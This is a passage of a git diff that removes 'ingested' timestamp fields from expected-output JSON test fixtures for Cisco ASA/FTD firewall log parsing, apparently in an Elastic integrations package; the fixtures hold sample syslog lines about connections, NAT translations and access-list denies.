Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", 
@@ -134,7 +133,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081548856Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +201,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081549868Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +276,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081550692Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +336,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T09:58:05.081551643Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 57dd8d150ca..ecf8868db4b 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009015540Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", 
@@ -138,7 +137,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009018852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +222,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009019985Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +306,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009020995Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +390,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009021974Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +474,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009023083Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -564,7 +558,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009024070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +642,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009025037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +726,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009026026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +810,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009027016Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +894,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009028070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -989,7 +978,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009029207Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1062,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009030232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1146,6 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009031202Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1230,6 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009032196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1314,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009033247Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1414,7 +1398,6 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009034512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1482,6 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009035483Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1566,6 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-29T09:58:07.009036476Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1647,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009037451Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1725,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009038507Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -1830,7 +1809,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009039481Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1891,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009040459Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1975,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009041551Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2056,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009042527Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2134,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009043519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2216,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009044494Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", 
@@ -2321,7 +2294,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009045477Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2377,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009046461Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2460,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009047423Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2544,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009048392Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2627,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009049458Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", 
@@ -2740,7 +2708,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009050435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2786,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009051420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2868,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009052526Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2946,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009053508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3029,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009054578Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3113,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009055570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", 
@@ -3234,7 +3196,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009056550Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3277,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009057513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3355,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009058483Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3438,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009059527Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3521,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009060511Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3648,7 +3605,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009061485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3688,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009062465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3769,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009063436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3847,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009064548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3932,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009065569Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", 
@@ -4062,7 +4014,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009066538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4098,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009067533Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4181,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009068673Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4262,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009069659Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4340,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009070626Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4422,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009071614Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", 
@@ -4554,7 +4500,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009072578Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4582,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009073575Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4660,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009074622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4743,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009075624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4827,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009076598Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4908,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009077581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", 
@@ -5046,7 +4986,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009078559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5068,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009079576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5146,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009080663Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5229,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009081639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5314,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009082604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5395,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009083577Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", 
@@ -5539,7 +5473,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009084558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5557,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009085625Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5638,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009086610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5716,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009087589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5837,7 +5767,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009088559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5915,7 +5844,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009089535Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", 
@@ -5994,7 +5922,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009090519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6046,7 +5973,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009091525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6093,7 +6019,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009092661Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6140,7 +6065,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009093639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6187,7 +6111,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009094610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6234,7 +6157,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009096060Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", 
